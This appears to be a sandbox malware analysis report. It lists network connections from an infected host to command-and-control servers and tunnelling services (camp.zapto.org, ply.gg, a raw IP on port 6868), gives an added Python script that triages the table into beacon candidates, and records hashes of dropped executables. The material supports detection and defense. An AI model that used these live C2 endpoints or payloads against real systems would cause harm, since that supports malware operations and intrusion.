| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| US | 154.216.18.132:6868 | | tcp |
| DE | 13.32.121.30:80 | updates.signiant.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 30.121.32.13.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.25.223.76.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 154.216.17.90:80 | | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| GB | 2.19.117.96:80 | webcdn.triongames.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 8.8.8.8:53 | 96.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.81.68.147:1912 | | tcp |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.70.67.172.in-addr.arpa | udp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 94.156.177.133:7000 | | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | 133.177.156.94.in-addr.arpa | udp |
| NL | 80.82.65.70:80 | 80.82.65.70 | tcp |
| US | 8.8.8.8:53 | 70.65.82.80.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | boot-01.net.anydesk.com | udp |
| DE | 195.181.174.173:443 | boot-01.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:80 | relay-ad195ac5.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 173.174.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| DE | 18.245.86.26:80 | api.playanext.com | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.81.68.147:1912 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 154.216.17.90:80 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| FR | 57.128.64.30:443 | boot.net.anydesk.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | relay-0135ac48.net.anydesk.com | udp |
| GB | 57.128.141.165:443 | relay-0135ac48.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 30.64.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.141.128.57.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 154.216.18.132:6868 | | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 154.216.18.132:6868 | | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 154.216.18.132:6868 | | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 154.216.18.132:6868 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 192.168.56.1:4782 | | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| HK | 47.244.167.171:801 | | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 171.167.244.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| BG | 195.230.23.72:80 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| BG | 195.230.23.72:80 | | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| BG | 195.230.23.72:80 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 192.168.56.1:4782 | | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| FR | 172.217.18.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 206.18.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | 160.181.213.54.in-addr.arpa | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.209:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| FR | 216.58.214.174:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.214.58.216.in-addr.arpa | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| FR | 216.58.214.174:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r4---sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| GB | 74.125.175.169:443 | r4---sn-aigzrnsz.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigzrnsz.gvt1.com | udp |
| GB | 74.125.175.169:443 | r4.sn-aigzrnsz.gvt1.com | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.175.125.74.in-addr.arpa | udp |
| N/A | 192.168.56.1:4782 | | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
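The connection table above is raw sandbox output: resolver traffic to 8.8.8.8, reverse (in-addr.arpa) lookups the sandbox performs on every peer, loopback, host-only (192.168.56.x) and multicast rows all sit beside the real command-and-control traffic. To turn it into an IOC list an analyst drops that noise and ranks what remains by repetition and by port, since a bare IP:port with no name that is hit dozens of times on a port like 6868 or 7771 is a beacon, not a download. The script below is an added example, not part of the original report. Its sample rows are copied from the table above (both cell layouts seen on the page are included, because the extractor sometimes collapsed the empty domain cell); the repeat threshold, the "standard port" set and the function names are this example's own choices.

```python
"""Triage a sandbox network-connection table into DNS lookups, per-destination
counts and beacon candidates.  Added example; the rows are copied from the
report's table, the classification rules are this example's assumptions."""
import ipaddress
from collections import Counter

# Constructed sample: rows copied verbatim from the table above.  Two layouts
# occur on the page: "| cc | ip:port | tcp | |" (empty domain cell dropped)
# and "| cc | ip:port | | tcp |" (domain cell present but empty).
SAMPLE_ROWS = """
| N/A | 127.0.0.1:53792 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 76.58.63.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
""".strip().splitlines()

# Ports on which a single hit is unremarkable; anything else is suspicious on
# its own.  This set is an assumption of the example, not a rule from the page.
STANDARD_PORTS = {53, 80, 443}


def parse_row(line):
    """Return (country, ip, port, domain, proto) for a table row, else None."""
    if not line.lstrip().startswith("|"):
        return None
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4:
        return None
    country, dest, c3, c4 = cells
    # Collapsed layout: protocol landed in the domain column, last cell empty.
    if c3 in ("tcp", "udp") and not c4:
        domain, proto = "", c3
    else:
        domain, proto = c3, c4
    ip, _, port = dest.rpartition(":")
    return country, ip, int(port), domain, proto


def is_noise(ip, port, domain, proto):
    """Resolver queries, reverse lookups and non-routable peers carry no IOC."""
    addr = ipaddress.ip_address(ip)
    # is_global alone is not enough: multicast (239.x) is not in the private list.
    if addr.is_multicast or addr.is_loopback or addr.is_private or addr.is_link_local:
        return True
    if port == 53 and proto == "udp":
        return True
    return domain.endswith(".in-addr.arpa")


def triage(lines, repeat_threshold=3):
    """Split rows into (forward DNS names, destination counter, beacon candidates).

    A destination is a candidate when it uses a non-standard port or is
    contacted at least `repeat_threshold` times after noise removal.
    """
    lookups, counts = set(), Counter()
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        _, ip, port, domain, proto = row
        # Forward DNS queries are worth keeping as domain IOCs even though the
        # resolver row itself is dropped below.
        if port == 53 and domain and not domain.endswith(".in-addr.arpa"):
            lookups.add(domain)
        if is_noise(ip, port, domain, proto):
            continue
        counts[(ip, port, domain)] += 1
    candidates = sorted(
        key for key, n in counts.items()
        if key[1] not in STANDARD_PORTS or n >= repeat_threshold
    )
    return lookups, counts, candidates


if __name__ == "__main__":
    names, hits, beacons = triage(SAMPLE_ROWS)
    print("resolved:", sorted(names))
    for (ip, port, domain), n in hits.most_common():
        print(f"{n:3d}  {ip}:{port}  {domain or '-'}")
    print("beacon candidates:", [f"{ip}:{port}" for ip, port, _ in beacons])
```

Fed the full table, the repeated 154.216.18.132:6868 connections and the tunnelled camp.zapto.org:7771, ply.gg and portmap.host destinations rise to the top, while the Firefox, Mozilla and gvt1.com rows remain on 443 with single hits and drop out of the candidate list. Treat the result as a starting point for blocking and hunting, not a verdict: a download server on port 80 hit once is still an IOC, and the `counts` map keeps it.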
Files
memory/4760-0-0x00007FFEF9FB3000-0x00007FFEF9FB5000-memory.dmp
memory/4760-1-0x00000000006F0000-0x00000000006F8000-memory.dmp
memory/4760-2-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
C:\Users\Admin\AppData\Local\Temp\a\client.exe
| MD5 | 52a3c7712a84a0f17e9602828bf2e86d |
| SHA1 | 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2 |
| SHA256 | afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288 |
| SHA512 | 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac |
memory/4704-34-0x000001C568CA0000-0x000001C568CB8000-memory.dmp
memory/4704-35-0x000001C56B440000-0x000001C56B602000-memory.dmp
memory/4704-36-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp
memory/4704-37-0x000001C56BD20000-0x000001C56C248000-memory.dmp
memory/4760-38-0x00007FFEF9FB3000-0x00007FFEF9FB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 3626532127e3066df98e34c3d56a1869 |
| SHA1 | 5fa7102f02615afde4efd4ed091744e842c63f78 |
| SHA256 | 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca |
| SHA512 | dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd |
memory/4760-52-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 045b0a3d5be6f10ddf19ae6d92dfdd70 |
| SHA1 | 0387715b6681d7097d372cd0005b664f76c933c7 |
| SHA256 | 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d |
| SHA512 | 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip
| MD5 | cea368fc334a9aec1ecff4b15612e5b0 |
| SHA1 | 493d23f72731bb570d904014ffdacbba2334ce26 |
| SHA256 | 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541 |
| SHA512 | bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | 0dc4014facf82aa027904c1be1d403c1 |
| SHA1 | 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831 |
| SHA256 | a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7 |
| SHA512 | cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | b7d1e04629bec112923446fda5391731 |
| SHA1 | 814055286f963ddaa5bf3019821cb8a565b56cb8 |
| SHA256 | 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789 |
| SHA512 | 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db |
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
| MD5 | d68f79c459ee4ae03b76fa5ba151a41f |
| SHA1 | bfa641085d59d58993ba98ac9ee376f898ee5f7b |
| SHA256 | aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6 |
| SHA512 | bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e |
memory/1996-115-0x00007FF74E900000-0x00007FF74ED90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\in.exe
| MD5 | 83d75087c9bf6e4f07c36e550731ccde |
| SHA1 | d5ff596961cce5f03f842cfd8f27dde6f124e3ae |
| SHA256 | 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f |
| SHA512 | 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 579a63bebccbacab8f14132f9fc31b89 |
| SHA1 | fca8a51077d352741a9c1ff8a493064ef5052f27 |
| SHA256 | 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0 |
| SHA512 | 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 5659eba6a774f9d5322f249ad989114a |
| SHA1 | 4bfb12aa98a1dc2206baa0ac611877b815810e4c |
| SHA256 | e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4 |
| SHA512 | f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | 5404286ec7853897b3ba00adf824d6c1 |
| SHA1 | 39e543e08b34311b82f6e909e1e67e2f4afec551 |
| SHA256 | ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266 |
| SHA512 | c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 5eb39ba3698c99891a6b6eb036cfb653 |
| SHA1 | d2f1cdd59669f006a2f1aa9214aeed48bc88c06e |
| SHA256 | e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2 |
| SHA512 | 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 7187cc2643affab4ca29d92251c96dee |
| SHA1 | ab0a4de90a14551834e12bb2c8c6b9ee517acaf4 |
| SHA256 | c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830 |
| SHA512 | 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3 |
C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe
| MD5 | 63c4e3f9c7383d039ab4af449372c17f |
| SHA1 | f52ff760a098a006c41269ff73abb633b811f18e |
| SHA256 | 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd |
| SHA512 | dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf |
C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
memory/3128-133-0x0000022C15D80000-0x0000022C15DA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkomrkjx.bg5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
